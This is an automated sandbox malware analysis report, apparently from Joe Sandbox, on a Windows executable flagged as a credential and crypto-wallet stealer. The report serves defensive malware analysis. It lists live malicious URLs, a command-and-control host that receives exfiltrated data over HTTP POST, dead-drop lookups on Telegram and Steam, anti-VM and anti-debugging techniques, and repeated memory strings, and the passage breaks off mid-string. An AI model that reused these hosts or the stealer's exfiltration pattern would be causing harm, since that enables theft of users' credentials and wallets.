Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
12Kp1xbcjv.exe

Overview

General Information

Sample name:12Kp1xbcjv.exe
renamed because original name is a hash value
Original sample name:7f8f887f8ab952b0128bb681e61e9c524938d1138c3234d12d49d62e03df16cd.exe
Analysis ID:1640127
MD5:924abe4b44086ef603a68ce2b2f26b67
SHA1:6670fe07e3c50a821047eaf5512fd7894ff2255d
SHA256:7f8f887f8ab952b0128bb681e61e9c524938d1138c3234d12d49d62e03df16cd
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • 12Kp1xbcjv.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\12Kp1xbcjv.exe" MD5: 924ABE4B44086EF603A68CE2B2F26B67)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.1280565524.0000000000823000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000003.1280817363.0000000000823000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.1265843707.0000000000823000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: 12Kp1xbcjv.exe PID: 7384JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-17T01:04:12.854668+010020283713Unknown Traffic192.168.2.449722149.154.167.99443TCP
          2025-03-17T01:04:14.228420+010020283713Unknown Traffic192.168.2.449723104.73.234.102443TCP
          2025-03-17T01:04:15.524504+010020283713Unknown Traffic192.168.2.449724104.21.32.1443TCP
          2025-03-17T01:04:17.312477+010020283713Unknown Traffic192.168.2.449725104.73.234.102443TCP
          2025-03-17T01:04:18.396829+010020283713Unknown Traffic192.168.2.449726104.21.32.1443TCP
          2025-03-17T01:04:20.168216+010020283713Unknown Traffic192.168.2.449729104.73.234.102443TCP
          2025-03-17T01:04:21.235949+010020283713Unknown Traffic192.168.2.449731104.21.32.1443TCP
          2025-03-17T01:04:22.568877+010020283713Unknown Traffic192.168.2.449732104.73.234.102443TCP
          2025-03-17T01:04:23.638881+010020283713Unknown Traffic192.168.2.449734104.21.32.1443TCP
          2025-03-17T01:04:25.590796+010020283713Unknown Traffic192.168.2.449736104.73.234.102443TCP
          2025-03-17T01:04:26.722058+010020283713Unknown Traffic192.168.2.449737104.21.32.1443TCP
          2025-03-17T01:04:28.277010+010020283713Unknown Traffic192.168.2.44973923.192.247.89443TCP
          2025-03-17T01:04:29.446823+010020283713Unknown Traffic192.168.2.44974023.192.247.89443TCP
          2025-03-17T01:04:30.712228+010020283713Unknown Traffic192.168.2.44974223.192.247.89443TCP
          2025-03-17T01:04:31.901980+010020283713Unknown Traffic192.168.2.44974323.192.247.89443TCP

          Joe Sandbox Signatures

          • AV Detection
          • Compliance
          • Networking
          • System Summary
          • Data Obfuscation
          • Hooking and other Techniques for Hiding and Protection
          • Malware Analysis System Evasion
          • Anti Debugging
          • Language, Device and Operating System Detection
          • Lowering of HIPS / PFW / Operating System Security Settings
          • Stealing of Sensitive Information

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 12Kp1xbcjv.exeAvira: detected
          Source: https://crosshairc.life/dAnjhwAvira URL Cloud: Label: malware
          Source: https://cjlaspcorne.icu/DbIpsgAvira URL Cloud: Label: malware
          Source: https://legenassedk.top/bdpWOAvira URL Cloud: Label: malware
          Source: https://weaponrywo.digital/dJSuajAvira URL Cloud: Label: malware
          Source: https://crosshairc.life/dAnjhw/Avira URL Cloud: Label: malware
          Source: https://cjlaspcorne.icu/DbIpsAvira URL Cloud: Label: malware
          Source: https://htardwarehu.icu/SbdsaAvira URL Cloud: Label: malware
          Source: 12Kp1xbcjv.exeVirustotal: Detection: 75%Perma Link
          Source: 12Kp1xbcjv.exeReversingLabs: Detection: 80%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: 12Kp1xbcjv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49722 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.4:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49724 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.4:49725 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49726 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.4:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.4:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49737 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49740 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: global trafficHTTP traffic detected: GET /farmercommu HTTP/1.1Connection: Keep-AliveHost: t.me
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
          Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
          Source: Joe Sandbox ViewIP Address: 23.192.247.89 23.192.247.89
          Source: Joe Sandbox ViewIP Address: 104.73.234.102 104.73.234.102
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49726 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49729 -> 104.73.234.102:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49723 -> 104.73.234.102:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49725 -> 104.73.234.102:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.73.234.102:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49724 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49722 -> 149.154.167.99:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 23.192.247.89:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 23.192.247.89:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 23.192.247.89:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.73.234.102:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 23.192.247.89:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.32.1:443
          Source: global trafficHTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: pupmeholk.bet
          Source: global trafficHTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LROCnNpQDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19576Host: pupmeholk.bet
          Source: global trafficHTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=vMTy2o0fOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8733Host: pupmeholk.bet
          Source: global trafficHTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2vr9fUz2mMhz3f8hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20421Host: pupmeholk.bet
          Source: global trafficHTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=gx8tk0NY2v6XxcBtUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2367Host: pupmeholk.bet
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /farmercommu HTTP/1.1Connection: Keep-AliveHost: t.me
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1261246061.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=0e4aa3bc766ffc70e75a3125; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type36132Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 17 Mar 2025 00:04:22 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=4f705a518d42933ca7b12f14; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type36132Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 17 Mar 2025 00:04:25 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1343875916.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=8d2f1eae79dc2596f9bf81a2; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 17 Mar 2025 00:04:32 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1318823303.00000000007FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=b96fe08812339ed15327ef77; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 17 Mar 2025 00:04:29 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Controlaa equals www.youtube.com (Youtube)
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=d575ff83348194aad1c461a7; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type36132Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 17 Mar 2025 00:04:17 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=efe798678573e2f05adb7e8a; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; 